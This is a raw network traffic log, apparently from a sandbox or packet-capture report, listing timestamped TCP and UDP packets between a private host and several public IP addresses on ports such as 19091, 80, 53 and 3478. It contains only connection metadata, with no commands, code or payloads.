Dec 29, 2024 11:18:28.877813101 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.877857924 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.879055023 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.879184008 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.879262924 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.883584023 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.883788109 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.883863926 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.887938976 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.888077021 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.888143063 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.892385960 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.892471075 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.892524004 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.896768093 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.896869898 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.896918058 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.901072979 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.901185989 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.901241064 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.905380964 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.905503988 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.905663967 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.909634113 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.909791946 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.909842014 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.913990974 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.914046049 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.914107084 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.918332100 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.918476105 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.918534994 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.922650099 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.922780037 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.922818899 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.926969051 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.927030087 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.927069902 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.931339025 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.931443930 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.931499004 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.935633898 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.935787916 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.935846090 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.940016031 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.940058947 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.940186024 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.944242954 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.944287062 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.944340944 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.948596001 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.948719025 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.948770046 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.952857971 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.953022003 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.953142881 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.957158089 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.957285881 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.957401991 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.961565018 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.961642981 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.961714983 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.965845108 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.965936899 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.966013908 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.970278025 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.970387936 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.970465899 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.974447012 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.974514008 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.974663019 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.978934050 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.979042053 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.979146957 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.983144045 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.983305931 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.983361959 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.987431049 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.987591982 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.987725973 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.991816998 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.991990089 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.992100954 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.996151924 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.996315002 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.996403933 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.000456095 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.000478029 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.000669003 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.004930973 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.004945040 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.005017042 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.009135008 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.073616982 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.094578028 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.094625950 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.094692945 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.096116066 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.096345901 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.096400023 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.099361897 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.099493980 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.099550009 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.102582932 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.102708101 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.102758884 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.105673075 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.105859041 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.106121063 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.108702898 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.108825922 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.108889103 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.111788034 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.111908913 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.111954927 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.114866018 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.114933968 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.114999056 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.117829084 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.117932081 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.118005037 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.120590925 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.120723963 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.120791912 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.123467922 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.123570919 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.123718977 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.126404047 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.126416922 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.126530886 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.129139900 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.129180908 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.129232883 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.132035971 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.132049084 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.132117033 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.134737015 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.134839058 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.134908915 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.137461901 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.137551069 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.137645006 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:29.140214920 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.140289068 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:29.140328884 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:30.231014013 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:30.350405931 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:30.350604057 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:30.444792986 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:30.564083099 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:30.564201117 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:30.603414059 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:30.722645998 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:32.175178051 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:32.175247908 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:32.216996908 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:33.320899010 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:33.440220118 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:33.562978983 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:33.682250023 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:33.682337046 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:33.682585955 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:33.801847935 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:33.886421919 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:33.886485100 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:33.888859034 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:34.008130074 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:34.440874100 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:34.441183090 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:34.443403006 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:34.562722921 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.006236076 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.006283998 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:35.011354923 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:35.130567074 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.286823034 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.287751913 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:35.288252115 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:35.407490969 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.568841934 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.568944931 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:35.569289923 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:35.688519955 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.850770950 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:35.850821972 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:35.878957033 CET	49756	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:35.879585981 CET	49757	80	192.168.2.7	39.156.85.231
Dec 29, 2024 11:18:35.880091906 CET	49758	80	192.168.2.7	39.156.85.201
Dec 29, 2024 11:18:35.998214006 CET	80	49756	39.156.85.200	192.168.2.7
Dec 29, 2024 11:18:35.998321056 CET	49756	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:35.998892069 CET	49756	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:35.999123096 CET	80	49757	39.156.85.231	192.168.2.7
Dec 29, 2024 11:18:35.999270916 CET	49757	80	192.168.2.7	39.156.85.231
Dec 29, 2024 11:18:35.999360085 CET	80	49758	39.156.85.201	192.168.2.7
Dec 29, 2024 11:18:35.999485970 CET	49758	80	192.168.2.7	39.156.85.201
Dec 29, 2024 11:18:36.118066072 CET	80	49756	39.156.85.200	192.168.2.7
Dec 29, 2024 11:18:36.120131969 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:36.120239973 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:37.177819967 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:37.297215939 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:37.297270060 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:37.297312021 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:37.297472954 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:37.370383024 CET	49765	80	192.168.2.7	39.156.85.231
Dec 29, 2024 11:18:37.489645004 CET	80	49765	39.156.85.231	192.168.2.7
Dec 29, 2024 11:18:37.490144014 CET	49765	80	192.168.2.7	39.156.85.231
Dec 29, 2024 11:18:37.587341070 CET	49766	80	192.168.2.7	39.156.85.201
Dec 29, 2024 11:18:37.610970974 CET	80	49756	39.156.85.200	192.168.2.7
Dec 29, 2024 11:18:37.611284971 CET	80	49756	39.156.85.200	192.168.2.7
Dec 29, 2024 11:18:37.611296892 CET	80	49756	39.156.85.200	192.168.2.7
Dec 29, 2024 11:18:37.611356974 CET	49756	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:37.647423983 CET	49756	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:37.650327921 CET	49767	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:37.706726074 CET	80	49766	39.156.85.201	192.168.2.7
Dec 29, 2024 11:18:37.706804037 CET	49766	80	192.168.2.7	39.156.85.201
Dec 29, 2024 11:18:37.726478100 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:37.726819992 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:37.769639015 CET	80	49767	39.156.85.200	192.168.2.7
Dec 29, 2024 11:18:37.769710064 CET	49767	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:37.770612955 CET	49767	80	192.168.2.7	39.156.85.200
Dec 29, 2024 11:18:37.846048117 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:37.871187925 CET	49757	80	192.168.2.7	39.156.85.231
Dec 29, 2024 11:18:37.871512890 CET	49758	80	192.168.2.7	39.156.85.201
Dec 29, 2024 11:18:37.871826887 CET	49765	80	192.168.2.7	39.156.85.231
Dec 29, 2024 11:18:37.872353077 CET	49766	80	192.168.2.7	39.156.85.201
Dec 29, 2024 11:18:38.581141949 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:38.584850073 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:38.700449944 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:38.704130888 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:39.146619081 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:39.146678925 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:39.183748007 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:39.303018093 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:39.654844999 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:39.654922009 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:39.747613907 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:39.747802019 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:49.542732000 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:49.654419899 CET	80	49748	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:49.654469967 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:49.662964106 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:49.748236895 CET	80	49738	171.8.167.90	192.168.2.7
Dec 29, 2024 11:18:49.748517036 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:18:50.086167097 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:50.136195898 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:50.193794012 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:50.313149929 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:06.839476109 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:06.958842993 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:07.382227898 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:07.433094025 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:07.462456942 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:07.581758022 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:23.449229956 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:23.568701982 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:23.991885900 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:24.042571068 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:24.079332113 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:24.198617935 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:39.214553118 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:39.333853960 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:39.756829023 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:39.823864937 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:39.910099983 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:40.029566050 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:56.684322119 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:56.688442945 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:56.803872108 CET	19091	49736	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:56.803944111 CET	49736	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:58.840095997 CET	49949	19092	192.168.2.7	118.107.44.219
Dec 29, 2024 11:19:58.999528885 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:19:58.999638081 CET	49949	19092	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:06.528114080 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:06.528260946 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:06.886543036 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:06.926266909 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:06.930882931 CET	49949	19092	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:07.050371885 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:07.050384045 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:07.050479889 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:07.050489902 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:07.589617014 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:07.620985031 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:07.679193020 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:07.679450035 CET	49949	19092	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:07.798728943 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:08.824029922 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:08.886506081 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:11.226471901 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:11.386545897 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:16.120913029 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:16.199110985 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:22.105398893 CET	49949	19092	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:22.105448008 CET	49949	19092	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:22.224776030 CET	19092	49949	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:22.224844933 CET	49949	19092	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:24.043499947 CET	49996	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:24.162883043 CET	19091	49996	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:24.162978888 CET	49996	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:25.730345964 CET	49748	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:25.808459044 CET	49738	80	192.168.2.7	171.8.167.90
Dec 29, 2024 11:20:28.729831934 CET	49996	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:28.849347115 CET	19091	49996	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:28.849433899 CET	19091	49996	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:28.849452972 CET	19091	49996	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:28.849545002 CET	19091	49996	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:29.277762890 CET	19091	49996	118.107.44.219	192.168.2.7
Dec 29, 2024 11:20:29.278063059 CET	49996	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:20:29.397393942 CET	19091	49996	118.107.44.219	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 11:18:14.794842958 CET	57776	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:15.085813046 CET	53	57776	1.1.1.1	192.168.2.7
Dec 29, 2024 11:18:30.285932064 CET	65491	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:30.423779011 CET	53	65491	1.1.1.1	192.168.2.7
Dec 29, 2024 11:18:30.708944082 CET	53817	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:30.823026896 CET	53064	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:30.825977087 CET	61640	53	192.168.2.7	1.1.1.1
Dec 29, 2024 11:18:30.960895061 CET	53	53064	1.1.1.1	192.168.2.7
Dec 29, 2024 11:18:30.964226961 CET	53	61640	1.1.1.1	192.168.2.7
Dec 29, 2024 11:18:31.014172077 CET	10007	80	192.168.2.7	1.192.136.135
Dec 29, 2024 11:18:31.252985954 CET	53	53817	1.1.1.1	192.168.2.7
Dec 29, 2024 11:18:31.302263021 CET	18434	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.302263021 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.302318096 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.380242109 CET	18434	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.380279064 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.380279064 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.747203112 CET	18434	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.747239113 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.747252941 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.902019024 CET	18434	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.902036905 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:31.902048111 CET	18435	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.213383913 CET	18434	3478	192.168.2.7	1.192.136.170
Dec 29, 2024 11:18:32.213413000 CET	18435	3478	192.168.2.7	1.192.136.170
